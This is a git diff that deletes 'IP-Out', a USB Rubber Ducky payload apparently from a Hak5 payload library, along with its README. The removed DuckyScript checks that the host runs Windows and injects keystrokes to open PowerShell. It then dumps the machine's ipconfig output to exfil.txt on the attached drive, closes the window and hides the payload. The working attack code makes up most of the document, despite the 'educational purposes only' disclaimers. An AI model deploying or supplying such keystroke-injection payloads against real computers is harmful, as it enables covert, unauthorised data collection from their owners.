Delete payloads/library/credentials/IP-Out directory
parent
63e0c18618
commit
8be0f9a092
|
@ -1,12 +0,0 @@
|
||||||
# IP-OUT
|
|
||||||
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Useful Tips
|
|
||||||
|
|
||||||
**Change #DRIVELABEL to your own personal drive label if it isn't already**
|
|
||||||
|
|
||||||
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
|
|
|
@ -1,64 +0,0 @@
|
||||||
REM Title: IP-Out
|
|
||||||
REM Author: Mavisinator30001
|
|
||||||
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
|
||||||
REM Target: Any Windows System
|
|
||||||
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
|
||||||
DEFINE #DRIVELABEL D
|
|
||||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
|
||||||
REM VERSION 1.1
|
|
||||||
REM AUTHOR: Korben
|
|
||||||
|
|
||||||
REM_BLOCK DOCUMENTATION
|
|
||||||
Windows fully passive OS Detection and passive Detect Ready
|
|
||||||
Includes its own passive detect ready.
|
|
||||||
Does not require additional extensions.
|
|
||||||
|
|
||||||
USAGE:
|
|
||||||
Extension runs inline (here)
|
|
||||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
|
||||||
boot delay
|
|
||||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
|
||||||
See end of payload for usage within payload
|
|
||||||
END_REM
|
|
||||||
|
|
||||||
REM CONFIGURATION:
|
|
||||||
DEFINE #MAX_WAIT 150
|
|
||||||
DEFINE #CHECK_INTERVAL 20
|
|
||||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
|
||||||
DEFINE #NOT_WINDOWS 7
|
|
||||||
|
|
||||||
$_OS = #NOT_WINDOWS
|
|
||||||
|
|
||||||
VAR $MAX_TRIES = #MAX_WAIT
|
|
||||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
|
||||||
DELAY #CHECK_INTERVAL
|
|
||||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
|
||||||
END_WHILE
|
|
||||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
|
||||||
$_OS = WINDOWS
|
|
||||||
END_IF
|
|
||||||
|
|
||||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
|
||||||
IF ($_OS == WINDOWS) THEN
|
|
||||||
STRING HELLO WINDOWS!
|
|
||||||
ELSE
|
|
||||||
STRING HELLO WORLD!
|
|
||||||
END_IF
|
|
||||||
END_REM
|
|
||||||
END_EXTENSION
|
|
||||||
IF $_OS != WINDOWS
|
|
||||||
STOP_PAYLOAD
|
|
||||||
END_IF
|
|
||||||
ATTACKMODE HID STORAGE
|
|
||||||
DELAY 500
|
|
||||||
GUI r
|
|
||||||
DELAY 300
|
|
||||||
STRINGLN Powershell
|
|
||||||
DELAY 1000
|
|
||||||
DEFINE #DRIVELABEL DUCKY
|
|
||||||
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
|
||||||
WAIT_FOR_STORAGE_ACTIVITY
|
|
||||||
WAIT_FOR_STORAGE_INACTIVITY
|
|
||||||
ALT F4
|
|
||||||
ATTACKMODE OFF
|
|
||||||
HIDE_PAYLOAD
|
|